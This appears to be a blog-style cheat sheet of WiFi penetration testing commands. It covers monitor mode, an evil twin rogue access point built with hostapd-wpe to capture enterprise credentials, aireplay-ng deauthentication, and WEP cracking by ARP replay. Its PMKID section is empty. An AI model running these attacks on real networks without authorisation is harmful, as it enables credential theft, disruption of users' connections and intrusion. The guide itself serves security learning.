Hey there, hackers! ๐ This guide will be a comprehensive list of WiFi penetration testing commands, including the tools and techniques you need to get started.
Switching Wireless Modes ๐โ
Before we dive into the nitty-gritty of WiFi penetration testing, let's talk about switching wireless card modes. There are two primary modes: Monitor Mode and Managed Mode.
Monitor Mode (airmon-ng) ๐โ
Monitor Mode allows your wireless card to capture and analyze packets in the air. To enable Monitor Mode using airmon-ng, run the following commands:
# Kill every processes that might interfere with the card
airmon-ng check kill
# Start monitor mode on wlan0
airmon-ng start wlan0
Monitor Mode (manual) ๐คโ
Alternatively, you can enable Monitor Mode manually using the following commands:
# Check wireless interface and its status
iwconfig
# disable the network interface
ifconfig wlan0 down
# change the mode of wlan0 to "monitor"
iwconfig wlan0 mode monitor
# re-enable the network interface
ifconfig wlan0 up
Rogue APs (Evil Twin Attack) ๐ปโ
A Rogue AP, also known as an Evil Twin Attack, is a type of attack where an attacker creates a fake wireless access point (AP) that mimics a legitimate AP. This can be used to capture sensitive information, such as login credentials.
For WPA/WPA2 MGT (Enterprise) ๐โ
To create a Rogue AP for WPA/WPA2 MGT (Enterprise), follow these steps:
- Install dependencies:
sudo apt install libnl-3-dev libssl-dev
sudo apt install hostapd-wpe
- Add the following configuration to the end of the file:
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
...
interface=wlan1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ssid=LKY_Test
channel=1
hw_mode=b
auth_server_addr=127.0.0.1
auth_server_port=18120
auth_server_shared_secret=p@ssw0rd
wpa_pairwise=TKIP CCMP
- Run the fake AP with RADIUS server:
sudo airmon-ng check kill
sudo /usr/sbin/hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Deauthentication ๐ซโ
Deauthentication is a technique used to disconnect a client from a wireless network. This can be used to capture sensitive information, such as login credentials.
Deauthentication using Aireplay-ng ๐โ
To deauthenticate a client using Aireplay-ng, run the following command:
# Deauth 00:0F:B5:34:30:30
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 wlan0
# Broadcast (doesn't always work)
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 wlan0
WEP Cracking ๐โ
WEP (Wired Equivalent Privacy) is a deprecated encryption protocol used to secure wireless networks. Cracking WEP is relatively easy and can be done using the following steps:
- Start monitor mode for the wireless card at a specific channel:
airmon-ng start wlan0 6
- Start
airodump-ngto capture the IVs:
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w output wlan0
- Start another terminal and do a fake authentication with the AP:
aireplay-ng -1 0 -e Lucky_Wifi_5G -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
- Start aireplay-ng in ARP request replay mode:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0
WLAN Monitoring and Analysis ๐โ
WLAN monitoring and analysis is an essential part of WiFi penetration testing. Here are some tools you can use to monitor and analyze WLAN traffic:
airodump-ng ๐โ
airodump-ng is a tool that allows you to capture and analyze WLAN traffic. Here's an example of how to use it:
# start monitor mode
airmon-ng check kill
airmon-ng start wlan0
# monitor wireless packets
airodump-ng wlan1 -w ap_scan_1
iwlist ๐โ
iwlist is a tool that allows you to scan for WLAN networks and gather information about them. Here's an example of how to use it:
iwlist wlan0 scan
kismet ๐โ
kismet is a tool that allows you to capture and analyze WLAN traffic. Here's an example of how to use it:
kismet -c wlan0
nmcli ๐โ
nmcli is a tool that allows you to manage and analyze WLAN connections. Here's an example of how to use it:
nmcli dev wifi list
WPA2-PSK Cracking ๐โ
WPA2-PSK is a widely used encryption protocol for WLAN networks. Cracking WPA2-PSK is relatively difficult, but it can be done using the following steps:
PMKID Attack ๐โ
The PMKID attack is a type of attack that allows you to crack WPA2-PSK passwords. Here's an example of how to use it:
# (Note: This section is incomplete and will be updated soon)
Conclusion ๐โ
WiFi penetration testing is a complex and challenging field, but with the right tools and techniques, you can become a proficient WiFi penetration tester. Remember to always use your skills for good and never for malicious purposes.
Additional Resources ๐โ
Here are some additional resources that you can use to learn more about WiFi penetration testing:
Happy hacking! ๐